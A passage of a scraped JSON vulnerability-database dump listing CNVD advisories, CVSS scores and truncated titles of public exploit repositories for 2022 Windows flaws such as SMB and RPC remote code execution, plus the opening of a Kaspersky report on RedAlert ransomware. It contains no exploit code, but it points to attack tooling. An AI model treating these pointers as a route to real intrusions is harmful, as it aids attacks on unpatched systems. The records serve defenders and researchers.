"2022-09-10T00:00:00", "id": "CNVD-2022-62520", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2022-62520", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-11-07T17:42:40", "description": "Microsoft Windows Network File System is a file sharing solution from Microsoft that allows you to transfer files between computers running Windows Server and UNIX operating systems using the NFS protocol. Network File System is vulnerable to a remote code execution vulnerability caused by a flaw in the Network File System component. 
An attacker could exploit this vulnerability to execute arbitrary code on the system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-15T00:00:00", "type": "cnvd", "title": "Microsoft Windows Network File System Remote Code Execution Vulnerability (CNVD-2022-74601)", "bulletinFamily": "cnvd", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24497"], "modified": "2022-11-07T00:00:00", "id": "CNVD-2022-74601", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2022-74601", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-09-10T21:56:04", "description": "Microsoft Windows Common Log File System Driver is a Microsoft Corporation Common Log File System (CLFS) API that provides a high-performance, common log file subsystem that can be used by dedicated client applications and shared by multiple clients to optimize log access. An elevation-of-privilege vulnerability exists in the Microsoft Windows Common Log File System Driver. 
An attacker could exploit this vulnerability to execute arbitrary code with elevated privileges.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-15T00:00:00", "type": "cnvd", "title": "Microsoft Windows Common Log File System Driver\u6743\u9650\u63d0\u5347\u6f0f\u6d1e", "bulletinFamily": "cnvd", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24521"], "modified": "2022-09-10T00:00:00", "id": "CNVD-2022-62521", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2022-62521", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-12-03T05:22:02", "description": "Microsoft Windows is an operating system for personal devices from Microsoft Corporation (USA).A remote code execution vulnerability exists in Microsoft Windows DNS Server, which can be exploited by attackers to execute arbitrary code on the system.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, 
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-15T00:00:00", "type": "cnvd", "title": "Microsoft Windows DNS Server Remote Code Execution Vulnerability (CNVD-2022-84116)", "bulletinFamily": "cnvd", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26812"], "modified": "2022-12-02T00:00:00", "id": "CNVD-2022-84116", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2022-84116", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-10-27T11:20:29", "description": "Microsoft Windows is an operating system for personal devices, and Microsoft Windows Server is a server operating system, of which Windows DNS Server is a DNS (Domain Name System) server. 
code execution vulnerability, which can be exploited by attackers to execute arbitrary code on the system.", "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.6, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-15T00:00:00", "type": "cnvd", "title": "Microsoft Windows DNS Server Remote Code Execution Vulnerability (CNVD-2022-71743)", "bulletinFamily": "cnvd", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26814"], "modified": "2022-10-27T00:00:00", "id": "CNVD-2022-71743", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2022-71743", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-10-28T11:26:54", "description": "Microsoft Windows is an operating system for personal devices, Microsoft Windows Server is a server operating system, and Windows DNS Server is one of the DNS (Domain Name System) servers. code execution vulnerability in Microsoft Windows DNS Server. The vulnerability stems from the failure of a network system or product to properly filter special elements of code segments during external input data construction. 
An attacker could use this vulnerability to execute arbitrary code on the system.", "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.6, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-15T00:00:00", "type": "cnvd", "title": "Microsoft Windows DNS Server Remote Code Execution Vulnerability (CNVD-2022-71975)", "bulletinFamily": "cnvd", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26829"], "modified": "2022-10-28T00:00:00", "id": "CNVD-2022-71975", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2022-71975", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}], "githubexploit": [{"lastseen": "2023-05-27T15:32:44", "description": "# CVE-2022-24483\nPOC For C...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-04-12T18:04:29", "type": "githubexploit", "title": 
"Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24483"], "modified": "2023-01-10T14:31:15", "id": "35A3A9CB-BAAD-5901-9147-926EDBCDC9D3", "href": "", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2023-05-27T15:19:22", "description": "CVE-2022-24491\n=================================\n\nA Zeek detecto...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-13T12:40:57", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24491"], 
"modified": "2022-12-14T08:58:43", "id": "D2BD2CCB-A50C-50C6-B8BB-ED7CEA7D850F", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-27T15:31:53", "description": "CVE-2022-24497\n=================================\n\nA Zeek detecto...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-13T17:12:59", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24497"], "modified": "2022-09-16T01:31:24", "id": "E2BC391B-CF45-5495-A025-1C766EBC0033", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-17T07:59:53", "description": "# CVE-2022-24500-RCE\nCVE-2022-24500 Windows SMB Remote Code Exec...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-08-15T07:52:50", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24500"], "modified": "2022-08-17T03:05:37", "id": "EF533CA5-B0FD-5588-8791-232612DF887F", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T15:51:43", "description": "# CVE-2022-24500-RCE\nCVE-2022-24500 Windows SMB Remote Code Exec...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-17T11:25:12", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": 
"AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24500"], "modified": "2022-08-16T06:31:21", "id": "23528F1E-CDCF-55BF-BE95-F887FF5EB2A6", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-19T10:09:17", "description": "# CVE-2022-24500 RCE Exploit\n\n### Windows SMB Remote Code Execut...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-19T03:32:12", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24500"], "modified": "2022-05-19T09:59:13", "id": "07076E26-7013-5B65-9FA9-CB53E0968E48", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-30T14:03:53", "description": "# CVE-2022-26809-MASS-RCE\nCVE-2022-26809 | is a remote code exec...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", 
"confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-29T14:58:52", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26809"], "modified": "2022-05-29T15:00:38", "id": "0FD9136A-3E4D-5411-B250-50BFE6958C1B", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-22T16:36:27", "description": "# CVE-2022-26809 RCE\n\n## CVE description\nCVE-2022-26809 - weakne...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-09T16:48:30", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, 
"userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26809"], "modified": "2022-06-22T13:22:14", "id": "6D97B250-96C0-5F04-AB74-361E54407E64", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-08T17:57:39", "description": "# CVE-2022-26809-RCE-POC\nwriteup and poc for cve-2022-26809\n\n\nCV...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-08T17:22:21", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26809"], "modified": "2022-06-08T17:46:48", "id": "11042BCC-1F42-5B57-B4AE-C5167CE829D6", "href": "", "cvss": {"score": 10.0, "vector": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-27T13:11:14", "description": "# CVE-2022-26809\nA proof of concept of the CVE-2022-26809-RCE v...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-20T11:08:29", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26809"], "modified": "2022-04-27T12:07:44", "id": "17D73993-DDAF-58B2-9041-7D2FF7F49F48", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-21T16:46:42", "description": "# CVE-2022-26809\n\n\nWe have...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-05T06:51:05", "type": 
"githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26809"], "modified": "2022-08-21T15:16:49", "id": "EE079BE6-0575-5AD9-9097-B2B35F50BC5A", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-26T05:03:00", "description": "# CVE-2022-26809\nThis tool is NOT free to prevent abuse. As of n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-12T07:12:08", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, 
"attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-28T00:00:00", "type": "cisa_kev", "title": "Google Chromium V8 Type Confusion Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1096"], "modified": "2022-03-28T00:00:00", "id": "CISA-KEV-CVE-2022-1096", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "securelist": [{"lastseen": "2022-08-24T17:10:52", "description": "\n\n## Introduction\n\nIn our crimeware reporting service, we analyze the latest crime-related trends we come across. Last month, we again posted a lot on ransomware, but we also covered other subjects, such as 1-day exploits. In this blogpost, we provide excerpts from these reports.\n\nFor questions or more information about our crimeware reporting service, please contact [crimewareintel@kaspersky.com](<mailto:crimewareintel@kaspersky.com>).\n\n## RedAlert / N13V: yet another multiplatform ransomware variant\n\nRedAlert (aka N13V) is the latest in the multiplatform ransomware trend we described [here](<https://securelist.com/new-ransomware-trends-in-2022/106457/>) and [here](<https://securelist.com/luna-black-basta-ransomware/106950/>). 
The difference this time, though, is that it is not written in a cross-platform language but in C \u2014 at least the Linux version that we could get our hands on, was. It does, however, explicitly support ESXi environments. For example, it has the command-line option "-w", which stops running VMs, and it also searches for VMWare-based VMs as can be seen from the screenshots below.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/23163047/Ransomware_updates__1-day_exploits_01.png>)\n\n**_Note the specific VMWare-related strings the malware looks for_**\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/23163133/Ransomware_updates__1-day_exploits_02.png>)\n\n**_Stopping VMs_**\n\nInterestingly, the group mentions on their onion website that a decryptor is available on all platforms. Unfortunately, we could not get our hands on the other versions, so we don't know whether the decryptor is written in a cross-platform language or not.\n\nAnother aspect that sets RedAlert apart from other ransomware groups is that they only accept payments in Monero. From a criminal point of view, the advantage is that payments cannot be traced. The problem, however, is that Monero is not accepted in every country or by every exchange, making a ransom payment more difficult for the victim.\n\nSince the group is relatively young, we couldn't find out a lot about the victimology, but RedAlert stands out as an interesting example of a group that managed to adjust their code written in C to different platforms.\n\n## Monster: Ransomware with a GUI\n\nIn July, our Darknet monitoring system detected yet another new 